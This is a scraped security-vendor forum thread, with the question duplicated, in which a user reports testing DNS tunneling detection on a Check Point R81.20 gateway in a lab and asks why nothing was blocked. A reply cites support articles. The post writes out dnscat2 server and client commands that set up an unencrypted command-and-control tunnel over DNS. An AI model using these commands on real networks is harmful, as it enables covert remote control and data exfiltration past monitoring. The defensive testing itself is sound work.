https://community.checkpoint.com/t5/Firewall-and-Security-Management/R81-20-DNS-Tunneling-Detection/m-p/195846#M36524 <P>Hi Expert ，&nbsp;</P><P>&nbsp; &nbsp; &nbsp; As we know ,The R81.20 has publish a new feature&nbsp; DNS security blade&nbsp; .&nbsp; I have try use the DNSCAT2 to testing the DNS tunneling attack&nbsp; but not found any prevention log&nbsp; , ONLY see the firewall DNS log .</P><P>&nbsp; &nbsp; &nbsp; &nbsp;In the gateway&nbsp; &nbsp;enable Anti-bot、Anti-malware&nbsp; and IPS blade ;</P><P>&nbsp; &nbsp; &nbsp; Testing topology :&nbsp; &nbsp;DNSCAT2_Server &lt; ---&gt; Gateway&lt; ---&gt;&nbsp;&nbsp;DNSCAT2_Client&nbsp;&nbsp;</P><P>&nbsp; &nbsp; &nbsp; &nbsp;Form &nbsp;DNSCAT2 Server side use command&nbsp; "<FONT color="#FF0000">ruby ./dnscat2.rb --security=open</FONT> " create a DNS&nbsp; listen and without encryption&nbsp; . In the Client side use command " <FONT color="#FFFF00">.<FONT color="#FF0000">/dnscat --dns server=10.0.20.2,port=53</FONT></FONT> "&nbsp; &nbsp; CC to&nbsp; server .&nbsp; When the establish&nbsp; can use that tunnel doing any action on the client PC .</P><P>&nbsp; &nbsp; Base&nbsp; on&nbsp; this lab , I want know why&nbsp; &nbsp;haven't catching the DNS tunneling&nbsp; ,Thanks !&nbsp;</P><P>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</P> Sun, 22 Oct 2023 13:13:37 GMT LongjiangLI 2023-10-22T13:13:37Z https://community.checkpoint.com/t5/Firewall-and-Security-Management/R81-20-DNS-Tunneling-Detection/m-p/195846#M36524 <P>Hi Expert ，&nbsp;</P><P>&nbsp; &nbsp; &nbsp; As we know ,The R81.20 has publish a new feature&nbsp; DNS security blade&nbsp; .&nbsp; I have try use the DNSCAT2 to testing the DNS tunneling attack&nbsp; but not found any prevention log&nbsp; , ONLY see the firewall DNS log .</P><P>&nbsp; &nbsp; &nbsp; &nbsp;In the gateway&nbsp; &nbsp;enable Anti-bot、Anti-malware&nbsp; and IPS blade ;</P><P>&nbsp; &nbsp; &nbsp; Testing topology :&nbsp; &nbsp;DNSCAT2_Server &lt; ---&gt; Gateway&lt; ---&gt;&nbsp;&nbsp;DNSCAT2_Client&nbsp;&nbsp;</P><P>&nbsp; &nbsp; &nbsp; &nbsp;Form &nbsp;DNSCAT2 Server side use command&nbsp; "<FONT color="#FF0000">ruby ./dnscat2.rb --security=open</FONT> " create a DNS&nbsp; listen and without encryption&nbsp; . In the Client side use command " <FONT color="#FFFF00">.<FONT color="#FF0000">/dnscat --dns server=10.0.20.2,port=53</FONT></FONT> "&nbsp; &nbsp; CC to&nbsp; server .&nbsp; When the establish&nbsp; can use that tunnel doing any action on the client PC .</P><P>&nbsp; &nbsp; Base&nbsp; on&nbsp; this lab , I want know why&nbsp; &nbsp;haven't catching the DNS tunneling&nbsp; ,Thanks !&nbsp;</P><P>&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;</P> Sun, 22 Oct 2023 13:13:37 GMT https://community.checkpoint.com/t5/Firewall-and-Security-Management/R81-20-DNS-Tunneling-Detection/m-p/195846#M36524 LongjiangLI 2023-10-22T13:13:37Z https://community.checkpoint.com/t5/Firewall-and-Security-Management/R81-20-DNS-Tunneling-Detection/m-p/195857#M36526 <P>To start could you please confirm how your configuration is set per: sk74120 / sk92224</P> <P>Please also verify how this protection is currently set?</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Screen Shot 2019-12-06 at 4.15.13 PM.png" style="width: 999px;"><img src="https://community.checkpoint.com/t5/image/serverpage/image-id/22910i4F046B5352587E19/image-size/large?v=v2&amp;px=999" role="button" title="Screen Shot 2019-12-06 at 4.15.13 PM.png" alt="Screen Shot 2019-12-06 at 4.15.13 PM.png" /></span></P> <P>Refer also:&nbsp;<A href="https://support.checkpoint.com/results/sk/sk178487" target="_self">sk178487 - ThreatCloud DNS Tunneling Protection</A>&nbsp;</P> Mon, 23 Oct 2023 01:04:29 GMT https://community.checkpoint.com/t5/Firewall-and-Security-Management/R81-20-DNS-Tunneling-Detection/m-p/195857#M36526 Chris_Atkinson 2023-10-23T01:04:29Z